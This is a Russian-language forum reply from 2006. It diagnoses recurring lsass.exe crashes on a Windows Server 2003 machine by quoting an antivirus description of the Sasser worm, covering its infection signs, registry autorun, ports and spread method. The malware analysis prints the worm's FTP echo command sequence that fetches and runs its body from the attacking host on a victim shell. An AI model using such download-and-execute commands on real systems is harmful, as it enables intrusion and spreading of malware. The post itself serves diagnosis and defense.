Показать сообщение отдельно
Старый 09.08.2006, 17:20   #8
Dogmatist
ViP
 
Пол:Мужской
Регистрация: 03.10.2004
Сообщений: 5,601
По умолчанию Re: Lsass.exe - ошибка приложения...

[quote=DenisKrav]Стоит на работе win2003server на нем прокси для сотрудников, и в день по 2-4 раза выдает мне: Lsass.exe - ошибка приложения... Инструкция по адресу "0х77f4905d" обратилась к памяти по адресу "0х00002000". Памят не может быть "read"... quote]

У меня была подобная проблема "память не может быть "read". Посмотри вот здесь, мы обсуждали этот вопрос, может даст какие идеи
[Для просмотра ссылок требуется регистрация. Зарегистрироваться...]

Может быть дело и не в вирусах...

Добавлено через 20 минут 35 секунд
Вот немного информации. Похоже, что это может быть твоей проблемой...
Net-Worm.Win32.Sasser.a


<TABLE class=enc_tbl cellSpacing=0 cellPadding=3 width="100%" border=0><TBODY><TR><TD class=enc_row_1 noWrap></TD><TD class=enc_row_2 width="80%"></TD></TR><TR><TD class=enc_row_1 noWrap KLMark="loc_msg:vir_fields"></TD><TD class=enc_row_2 width="80%"></TD></TR></TBODY></TABLE><TABLE class=enc_ttl cellSpacing=0 cellPadding=3 width="100%" border=0><TBODY><TR><TD KLMark="virus_doctype:1">Технические детали</TD></TR></TBODY></TABLE>Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в [Для просмотра ссылок требуется регистрация. Зарегистрироваться...].
Патч, исправляющий данную уязвимость был выпущен 13 апреля 2004 года (его можно найти по ссылке выше). Первые экземпляры червя были обнаружены 30 апреля 2004 года.
Заражению подвержены компьютеры, работающие под управлением Windows 2000, Windows XP, Windows Server 2003. На других версиях Windows червь работоспособен, но заразить их извне, путем атаки через уязвимость, не сможет.
Червь написан на языке C/C++, с использованием компилятора Visual C. Имеет размер около 15 КБ, упакован PECompact2.
Признаками заражения компьютера являются:
  • Наличие файла "avserve.exe" в каталоге Windows.
  • Сообщение об ошибке (LSASS service failing) приводящее к перезагрузке системы.
Размножение

При запуске червь копирует себя в корневой каталог Windows с именем "avserve.exe" и регистрирует себя в ключе автозапуска:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run] "avserve.exe" = "%WINDIR%\avserve.exe"</PRE>Создает в памяти уникальный идентификатор "Jobaka3l" для определения своего присутствия в системе.
Запускает FTP службу на порту TCP 5554 и запускает 128 процедур своего размножения. В ходе работы червь пытается вызвать системную процедуру AbortSystemShutdown для запрета перезагрузки системы.
Червь запускает процедуры выбора IP-адресов для атаки и отсылает на порт TCP 445 запрос. В случае если удаленный компьютер отвечает на соединение и отправляет эксплоит LSASS, который, используя данную уязвимость, запускает на удаленной машине командную оболочку "cmd.exe" на TCP порту 9996.
После этого червь передает на атакуемую машину команды для загрузки и запуска своего тела:

echo offecho open [адрес машины с которой производится атака] 5554>>cmd.ftpecho anonymous>>cmd.ftpecho userecho bin>>cmd.ftpecho get [произвольное число]_up.exe>>cmd.ftpecho bye>>cmd.ftpecho onftp -s:cmd.ftp[произвольное число]_up.exeecho offdel cmd.ftpecho on</PRE>Таким образом один и тот же компьютер может многократно подвергаться атакам и содержать несколько копий червя в виде файлов с именами, например:

23101_up.exe5409_up.exe</PRE>и т.д.
Прочее

После заражения инфицированная машина выводит сообщение об ошибке LSASS service failing, после чего может попытаться перезагрузиться.
Червь создает в корневом каталоге диска C: файл "win.log", который содержит IP-адреса атакуемых машин.

Последний раз редактировалось Dogmatist; 09.08.2006 в 17:41.. Причина: Добавлено сообщение
Dogmatist вне форума
 
Ответить с цитированием Вверх
 
Время генерации страницы 0.08121 секунды с 9 запросами